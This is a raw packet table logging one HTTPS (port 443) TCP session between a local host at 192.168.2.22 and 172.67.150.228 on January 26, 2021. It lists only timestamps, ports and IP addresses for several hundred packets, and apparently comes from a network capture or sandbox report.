Jan 26, 2021 21:25:20.744776011 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744784117 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744807959 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.744827986 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.744966984 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.747205019 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.747231960 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.747253895 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.747276068 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.747299910 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.747307062 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750153065 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750360966 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750401020 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750431061 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750449896 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750463963 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750494957 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750520945 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750530958 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750541925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750590086 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750600100 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750633955 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750649929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750679016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750703096 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750725031 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750746965 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750767946 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750793934 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750813007 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750813961 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750844955 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750875950 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750900984 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.750927925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750969887 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.750993013 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751010895 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751036882 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751054049 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751086950 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751097918 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751102924 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751140118 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751164913 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751173973 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751187086 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751224041 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751250029 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751271963 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751276016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751317978 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751339912 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751358986 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751375914 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751403093 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751435041 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751468897 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751496077 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751513958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.751516104 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.751581907 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.752928972 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.752973080 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753005981 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753022909 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753031015 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753063917 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753089905 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753109932 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753110886 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753150940 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753173113 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753201008 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753216028 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753247023 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753273010 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753288984 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753325939 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753341913 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753344059 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753403902 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753415108 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753457069 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753468037 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753496885 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753520966 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753530979 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753545046 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753581047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753609896 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753632069 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753633022 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753674030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753691912 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753719091 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753742933 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753753901 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753772020 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753777981 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753815889 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753833055 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753858089 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753887892 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753900051 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753904104 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753941059 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.753967047 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753984928 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.753997087 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754035950 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754060984 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754077911 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754107952 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754122019 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754126072 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754163027 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754189014 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754201889 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754209042 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754245996 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754273891 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754286051 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754295111 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754343033 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754353046 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754386902 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754409075 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754431009 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754451036 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754477024 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754496098 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754523993 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754534006 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754564047 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754590988 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754610062 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754611969 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754651070 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754677057 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754689932 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754705906 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754746914 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754771948 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754787922 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754815102 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754827976 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754837990 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754877090 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754899979 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754911900 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.754923105 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754961967 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.754986048 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755000114 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755009890 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755058050 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755074978 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755103111 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755126953 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755143881 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755168915 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755187988 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755213976 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755233049 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755234003 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755271912 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755296946 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755309105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755320072 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755357027 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755383968 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755403996 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755409956 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755450010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755477905 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755495071 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755501032 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755536079 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755553007 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755579948 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755595922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755620956 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755628109 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755665064 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755691051 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755708933 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755712032 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755759954 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755770922 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755817890 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755837917 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755873919 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755897045 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755919933 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755940914 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755959988 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.755986929 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.755999088 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756009102 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756047010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756074905 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756087065 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756102085 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756146908 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756172895 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756190062 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756191015 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756232977 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756247997 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756273985 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756310940 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756325960 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756350040 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756376982 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756395102 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756397963 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756444931 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756454945 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756506920 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756576061 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756611109 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756658077 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.756690025 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.756714106 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.757855892 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766307116 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766362906 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766371012 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766391993 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766412020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766418934 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766427994 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766443014 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766465902 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766467094 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766482115 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766489983 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766511917 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766515017 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766520977 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766541958 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766556025 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766566038 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766586065 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766592979 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766603947 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766618967 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766642094 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766642094 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766649961 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766668081 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766689062 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766695023 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766695976 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766716003 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766745090 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766746998 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766760111 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766772032 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766793013 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766797066 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766801119 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766819954 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766844034 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766844988 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766856909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766870022 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766891003 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.766891956 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766906023 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.766933918 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767400026 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767420053 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767442942 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767452955 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767472029 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767493010 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767515898 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767518997 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767529964 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767539978 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767563105 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767565966 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767577887 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767589092 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767613888 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767617941 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767627001 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767659903 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767673016 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767693043 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767714977 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767719030 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767730951 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767741919 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767764091 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767765999 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767776966 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767792940 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.767816067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.767829895 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768471003 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768491983 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768515110 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768518925 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768528938 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768543005 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768565893 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768568039 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768589020 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768594027 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768599987 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768621922 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768642902 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768647909 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768655062 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768668890 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768695116 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768695116 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768708944 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768718004 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768738985 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768743038 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768744946 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768764973 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768790960 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768799067 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768810987 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768817902 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.768829107 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.768857002 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769586086 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769606113 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769629955 CET	443	49165	172.67.150.228	192.168.2.22
Jan 26, 2021 21:25:20.769630909 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769654036 CET	49165	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:25:20.769671917 CET	49165	443	192.168.2.22	172.67.150.228
